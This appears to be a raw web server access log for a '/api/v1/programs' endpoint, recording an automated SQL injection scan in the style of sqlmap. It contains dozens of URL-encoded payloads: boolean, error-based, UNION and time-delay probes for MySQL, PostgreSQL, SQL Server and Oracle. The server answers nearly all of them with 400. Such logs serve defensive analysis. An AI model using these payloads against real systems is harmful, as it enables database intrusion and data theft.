GET /api/v1/programs?id=1 200 76.189 ms
GET /api/v1/programs?id=1 200 3.984 ms
GET /api/v1/programs?id=4447 200 3.991 ms
GET /api/v1/programs?id=1%2C%28%29%2C%29.%22%27%2C%29 400 2.200 ms
GET /api/v1/programs?id=4955-4954 400 0.803 ms
GET /api/v1/programs?id=1.3KnLE 400 0.729 ms
GET /api/v1/programs?id=1%27OZqBuH%3C%27%22%3EZkXOuY 400 0.558 ms
GET /api/v1/programs?id=1%29%20AND%204935%3D5469%20AND%20%286019%3D6019 400 0.689 ms
GET /api/v1/programs?id=1%29%20AND%205589%3D5589%20AND%20%286680%3D6680 400 1.014 ms
GET /api/v1/programs?id=1%20AND%207121%3D8958 400 0.566 ms
GET /api/v1/programs?id=1%20AND%205589%3D5589 400 0.696 ms
GET /api/v1/programs?id=1%20AND%207234%3D8531--%20TGQp 400 0.757 ms
GET /api/v1/programs?id=1%20AND%205589%3D5589--%20picd 400 0.657 ms
GET /api/v1/programs?id=1%27%29%20AND%209832%3D4352%20AND%20%28%27bqWS%27%3D%27bqWS 400 0.597 ms
GET /api/v1/programs?id=1%27%29%20AND%205589%3D5589%20AND%20%28%27dOkb%27%3D%27dOkb 400 0.500 ms
GET /api/v1/programs?id=1%27%20AND%203145%3D6899%20AND%20%27fULl%27%3D%27fULl 400 0.517 ms
GET /api/v1/programs?id=1%27%20AND%205589%3D5589%20AND%20%27utPP%27%3D%27utPP 400 0.508 ms
GET /api/v1/programs?id=%28SELECT%20%28CASE%20WHEN%20%286421%3D4974%29%20THEN%201%20ELSE%20%28SELECT%204974%20UNION%20SELECT%207727%29%20END%29%29 400 0.858 ms
GET /api/v1/programs?id=%28SELECT%20%28CASE%20WHEN%20%284869%3D4869%29%20THEN%201%20ELSE%20%28SELECT%206628%20UNION%20SELECT%208247%29%20END%29%29 400 0.496 ms
GET /api/v1/programs?id=1%29%20AND%20EXTRACTVALUE%284420%2CCONCAT%280x5c%2C0x7170707171%2C%28SELECT%20%28ELT%284420%3D4420%2C1%29%29%29%2C0x716b7a7a71%29%29%20AND%20%286042%3D6042 400 0.572 ms
GET /api/v1/programs?id=1%20AND%20EXTRACTVALUE%284420%2CCONCAT%280x5c%2C0x7170707171%2C%28SELECT%20%28ELT%284420%3D4420%2C1%29%29%29%2C0x716b7a7a71%29%29 400 0.595 ms
GET /api/v1/programs?id=1%20AND%20EXTRACTVALUE%284420%2CCONCAT%280x5c%2C0x7170707171%2C%28SELECT%20%28ELT%284420%3D4420%2C1%29%29%29%2C0x716b7a7a71%29%29--%20luGE 400 0.606 ms
GET /api/v1/programs?id=1%27%29%20AND%20EXTRACTVALUE%284420%2CCONCAT%280x5c%2C0x7170707171%2C%28SELECT%20%28ELT%284420%3D4420%2C1%29%29%29%2C0x716b7a7a71%29%29%20AND%20%28%27LtRF%27%3D%27LtRF 400 0.418 ms
GET /api/v1/programs?id=1%27%20AND%20EXTRACTVALUE%284420%2CCONCAT%280x5c%2C0x7170707171%2C%28SELECT%20%28ELT%284420%3D4420%2C1%29%29%29%2C0x716b7a7a71%29%29%20AND%20%27Gqfn%27%3D%27Gqfn 400 0.784 ms
GET /api/v1/programs?id=1%29%20AND%206260%3DCAST%28%28CHR%28113%29%7C%7CCHR%28112%29%7C%7CCHR%28112%29%7C%7CCHR%28113%29%7C%7CCHR%28113%29%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%286260%3D6260%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7C%28CHR%28113%29%7C%7CCHR%28107%29%7C%7CCHR%28122%29%7C%7CCHR%28122%29%7C%7CCHR%28113%29%29%20AS%20NUMERIC%29%20AND%20%285175%3D5175 400 0.507 ms
GET /api/v1/programs?id=1%20AND%206260%3DCAST%28%28CHR%28113%29%7C%7CCHR%28112%29%7C%7CCHR%28112%29%7C%7CCHR%28113%29%7C%7CCHR%28113%29%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%286260%3D6260%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7C%28CHR%28113%29%7C%7CCHR%28107%29%7C%7CCHR%28122%29%7C%7CCHR%28122%29%7C%7CCHR%28113%29%29%20AS%20NUMERIC%29 400 0.644 ms
GET /api/v1/programs?id=1%20AND%206260%3DCAST%28%28CHR%28113%29%7C%7CCHR%28112%29%7C%7CCHR%28112%29%7C%7CCHR%28113%29%7C%7CCHR%28113%29%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%286260%3D6260%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7C%28CHR%28113%29%7C%7CCHR%28107%29%7C%7CCHR%28122%29%7C%7CCHR%28122%29%7C%7CCHR%28113%29%29%20AS%20NUMERIC%29--%20wZaJ 400 0.766 ms
GET /api/v1/programs?id=1%27%29%20AND%206260%3DCAST%28%28CHR%28113%29%7C%7CCHR%28112%29%7C%7CCHR%28112%29%7C%7CCHR%28113%29%7C%7CCHR%28113%29%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%286260%3D6260%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7C%28CHR%28113%29%7C%7CCHR%28107%29%7C%7CCHR%28122%29%7C%7CCHR%28122%29%7C%7CCHR%28113%29%29%20AS%20NUMERIC%29%20AND%20%28%27pbNS%27%3D%27pbNS 400 0.552 ms
GET /api/v1/programs?id=1%27%20AND%206260%3DCAST%28%28CHR%28113%29%7C%7CCHR%28112%29%7C%7CCHR%28112%29%7C%7CCHR%28113%29%7C%7CCHR%28113%29%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%286260%3D6260%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7C%28CHR%28113%29%7C%7CCHR%28107%29%7C%7CCHR%28122%29%7C%7CCHR%28122%29%7C%7CCHR%28113%29%29%20AS%20NUMERIC%29%20AND%20%27YAgD%27%3D%27YAgD 400 0.586 ms
GET /api/v1/programs?id=1%29%20AND%209182%20IN%20%28SELECT%20%28CHAR%28113%29%2BCHAR%28112%29%2BCHAR%28112%29%2BCHAR%28113%29%2BCHAR%28113%29%2B%28SELECT%20%28CASE%20WHEN%20%289182%3D9182%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%28113%29%2BCHAR%28107%29%2BCHAR%28122%29%2BCHAR%28122%29%2BCHAR%28113%29%29%29%20AND%20%288576%3D8576 400 0.738 ms
GET /api/v1/programs?id=1%20AND%209182%20IN%20%28SELECT%20%28CHAR%28113%29%2BCHAR%28112%29%2BCHAR%28112%29%2BCHAR%28113%29%2BCHAR%28113%29%2B%28SELECT%20%28CASE%20WHEN%20%289182%3D9182%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%28113%29%2BCHAR%28107%29%2BCHAR%28122%29%2BCHAR%28122%29%2BCHAR%28113%29%29%29 400 0.502 ms
GET /api/v1/programs?id=1%20AND%209182%20IN%20%28SELECT%20%28CHAR%28113%29%2BCHAR%28112%29%2BCHAR%28112%29%2BCHAR%28113%29%2BCHAR%28113%29%2B%28SELECT%20%28CASE%20WHEN%20%289182%3D9182%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%28113%29%2BCHAR%28107%29%2BCHAR%28122%29%2BCHAR%28122%29%2BCHAR%28113%29%29%29--%20XrOF 400 0.560 ms
GET /api/v1/programs?id=1%27%29%20AND%209182%20IN%20%28SELECT%20%28CHAR%28113%29%2BCHAR%28112%29%2BCHAR%28112%29%2BCHAR%28113%29%2BCHAR%28113%29%2B%28SELECT%20%28CASE%20WHEN%20%289182%3D9182%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%28113%29%2BCHAR%28107%29%2BCHAR%28122%29%2BCHAR%28122%29%2BCHAR%28113%29%29%29%20AND%20%28%27XEBr%27%3D%27XEBr 400 0.641 ms
GET /api/v1/programs?id=1%27%20AND%209182%20IN%20%28SELECT%20%28CHAR%28113%29%2BCHAR%28112%29%2BCHAR%28112%29%2BCHAR%28113%29%2BCHAR%28113%29%2B%28SELECT%20%28CASE%20WHEN%20%289182%3D9182%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%28113%29%2BCHAR%28107%29%2BCHAR%28122%29%2BCHAR%28122%29%2BCHAR%28113%29%29%29%20AND%20%27Iofd%27%3D%27Iofd 400 0.483 ms
GET /api/v1/programs?id=1%29%20AND%204225%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28113%29%7C%7CCHR%28112%29%7C%7CCHR%28112%29%7C%7CCHR%28113%29%7C%7CCHR%28113%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%284225%3D4225%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%28113%29%7C%7CCHR%28107%29%7C%7CCHR%28122%29%7C%7CCHR%28122%29%7C%7CCHR%28113%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20AND%20%283251%3D3251 400 0.737 ms
GET /api/v1/programs?id=1%20AND%204225%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28113%29%7C%7CCHR%28112%29%7C%7CCHR%28112%29%7C%7CCHR%28113%29%7C%7CCHR%28113%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%284225%3D4225%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%28113%29%7C%7CCHR%28107%29%7C%7CCHR%28122%29%7C%7CCHR%28122%29%7C%7CCHR%28113%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29 400 1.022 ms
GET /api/v1/programs?id=1%20AND%204225%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28113%29%7C%7CCHR%28112%29%7C%7CCHR%28112%29%7C%7CCHR%28113%29%7C%7CCHR%28113%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%284225%3D4225%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%28113%29%7C%7CCHR%28107%29%7C%7CCHR%28122%29%7C%7CCHR%28122%29%7C%7CCHR%28113%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29--%20UOsp 400 0.764 ms
GET /api/v1/programs?id=1%27%29%20AND%204225%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28113%29%7C%7CCHR%28112%29%7C%7CCHR%28112%29%7C%7CCHR%28113%29%7C%7CCHR%28113%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%284225%3D4225%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%28113%29%7C%7CCHR%28107%29%7C%7CCHR%28122%29%7C%7CCHR%28122%29%7C%7CCHR%28113%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20AND%20%28%27rreg%27%3D%27rreg 400 0.510 ms
GET /api/v1/programs?id=1%27%20AND%204225%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28113%29%7C%7CCHR%28112%29%7C%7CCHR%28112%29%7C%7CCHR%28113%29%7C%7CCHR%28113%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%284225%3D4225%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%28113%29%7C%7CCHR%28107%29%7C%7CCHR%28122%29%7C%7CCHR%28122%29%7C%7CCHR%28113%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20AND%20%27Xlbj%27%3D%27Xlbj 400 1.189 ms
GET /api/v1/programs?id=%28SELECT%20CONCAT%28CONCAT%28%27qppqq%27%2C%28CASE%20WHEN%20%284504%3D4504%29%20THEN%20%271%27%20ELSE%20%270%27%20END%29%29%2C%27qkzzq%27%29%29 400 0.790 ms
GET /api/v1/programs?id=1%29%3BSELECT%20PG_SLEEP%285%29-- 400 0.940 ms
GET /api/v1/programs?id=1%3BSELECT%20PG_SLEEP%285%29-- 400 0.604 ms
GET /api/v1/programs?id=1%27%29%3BSELECT%20PG_SLEEP%285%29-- 400 1.133 ms
GET /api/v1/programs?id=1%27%3BSELECT%20PG_SLEEP%285%29-- 400 1.026 ms
GET /api/v1/programs?id=1%29%3BWAITFOR%20DELAY%20%270%3A0%3A5%27-- 400 0.806 ms
GET /api/v1/programs?id=1%3BWAITFOR%20DELAY%20%270%3A0%3A5%27-- 400 0.535 ms
GET /api/v1/programs?id=1%27%29%3BWAITFOR%20DELAY%20%270%3A0%3A5%27-- 400 0.768 ms
GET /api/v1/programs?id=1%27%3BWAITFOR%20DELAY%20%270%3A0%3A5%27-- 400 0.543 ms
GET /api/v1/programs?id=1%29%3BSELECT%20DBMS_PIPE.RECEIVE_MESSAGE%28CHR%28111%29%7C%7CCHR%28117%29%7C%7CCHR%2875%29%7C%7CCHR%2867%29%2C5%29%20FROM%20DUAL-- 400 0.789 ms
GET /api/v1/programs?id=1%3BSELECT%20DBMS_PIPE.RECEIVE_MESSAGE%28CHR%28111%29%7C%7CCHR%28117%29%7C%7CCHR%2875%29%7C%7CCHR%2867%29%2C5%29%20FROM%20DUAL-- 400 0.528 ms
GET /api/v1/programs?id=1%27%29%3BSELECT%20DBMS_PIPE.RECEIVE_MESSAGE%28CHR%28111%29%7C%7CCHR%28117%29%7C%7CCHR%2875%29%7C%7CCHR%2867%29%2C5%29%20FROM%20DUAL-- 400 0.928 ms
GET /api/v1/programs?id=1%27%3BSELECT%20DBMS_PIPE.RECEIVE_MESSAGE%28CHR%28111%29%7C%7CCHR%28117%29%7C%7CCHR%2875%29%7C%7CCHR%2867%29%2C5%29%20FROM%20DUAL-- 400 0.480 ms
GET /api/v1/programs?id=1%29%20AND%20%28SELECT%208445%20FROM%20%28SELECT%28SLEEP%285%29%29%29ZsBe%29%20AND%20%283332%3D3332 400 0.578 ms
GET /api/v1/programs?id=1%20AND%20%28SELECT%208445%20FROM%20%28SELECT%28SLEEP%285%29%29%29ZsBe%29 400 0.595 ms
GET /api/v1/programs?id=1%20AND%20%28SELECT%208445%20FROM%20%28SELECT%28SLEEP%285%29%29%29ZsBe%29--%20jnwT 400 0.734 ms
GET /api/v1/programs?id=1%27%29%20AND%20%28SELECT%208445%20FROM%20%28SELECT%28SLEEP%285%29%29%29ZsBe%29%20AND%20%28%27joVK%27%3D%27joVK 400 0.637 ms
GET /api/v1/programs?id=1%27%20AND%20%28SELECT%208445%20FROM%20%28SELECT%28SLEEP%285%29%29%29ZsBe%29%20AND%20%27yDSg%27%3D%27yDSg 400 0.421 ms
GET /api/v1/programs?id=1%29%20AND%204299%3D%28SELECT%204299%20FROM%20PG_SLEEP%285%29%29%20AND%20%283404%3D3404 400 0.448 ms
GET /api/v1/programs?id=1%20AND%204299%3D%28SELECT%204299%20FROM%20PG_SLEEP%285%29%29 400 0.619 ms
GET /api/v1/programs?id=1%20AND%204299%3D%28SELECT%204299%20FROM%20PG_SLEEP%285%29%29--%20jigl 400 0.634 ms
GET /api/v1/programs?id=1%27%29%20AND%204299%3D%28SELECT%204299%20FROM%20PG_SLEEP%285%29%29%20AND%20%28%27tGUG%27%3D%27tGUG 400 0.410 ms
GET /api/v1/programs?id=1%27%20AND%204299%3D%28SELECT%204299%20FROM%20PG_SLEEP%285%29%29%20AND%20%27ykQv%27%3D%27ykQv 400 0.396 ms
GET /api/v1/programs?id=1%29%20WAITFOR%20DELAY%20%270%3A0%3A5%27%20AND%20%282380%3D2380 400 0.475 ms
GET /api/v1/programs?id=1%20WAITFOR%20DELAY%20%270%3A0%3A5%27 400 0.502 ms
GET /api/v1/programs?id=1%20WAITFOR%20DELAY%20%270%3A0%3A5%27--%20AtOl 400 0.543 ms
GET /api/v1/programs?id=1%27%29%20WAITFOR%20DELAY%20%270%3A0%3A5%27%20AND%20%28%27ocmv%27%3D%27ocmv 400 0.371 ms
GET /api/v1/programs?id=1%27%20WAITFOR%20DELAY%20%270%3A0%3A5%27%20AND%20%27TDrG%27%3D%27TDrG 400 0.446 ms
GET /api/v1/programs?id=1%29%20AND%204215%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2872%29%7C%7CCHR%2875%29%7C%7CCHR%28107%29%7C%7CCHR%2882%29%2C5%29%20AND%20%281720%3D1720 400 0.735 ms
GET /api/v1/programs?id=1%20AND%204215%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2872%29%7C%7CCHR%2875%29%7C%7CCHR%28107%29%7C%7CCHR%2882%29%2C5%29 400 0.445 ms
GET /api/v1/programs?id=1%20AND%204215%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2872%29%7C%7CCHR%2875%29%7C%7CCHR%28107%29%7C%7CCHR%2882%29%2C5%29--%20bdcm 400 0.461 ms
GET /api/v1/programs?id=1%27%29%20AND%204215%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2872%29%7C%7CCHR%2875%29%7C%7CCHR%28107%29%7C%7CCHR%2882%29%2C5%29%20AND%20%28%27fCWY%27%3D%27fCWY 400 0.458 ms
GET /api/v1/programs?id=1%27%20AND%204215%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2872%29%7C%7CCHR%2875%29%7C%7CCHR%28107%29%7C%7CCHR%2882%29%2C5%29%20AND%20%27YbaT%27%3D%27YbaT 400 0.448 ms
GET /api/v1/programs?id=1%29%20ORDER%20BY%201--%20AXeE 400 0.433 ms
GET /api/v1/programs?id=1%20ORDER%20BY%201--%20Axcq 400 0.414 ms
GET /api/v1/programs?id=1%20ORDER%20BY%201--%20smFd 400 0.711 ms
GET /api/v1/programs?id=1%27%29%20ORDER%20BY%201--%20rQNl 400 0.455 ms
GET /api/v1/programs?id=1%27%20ORDER%20BY%201--%20KpXe 400 0.411 ms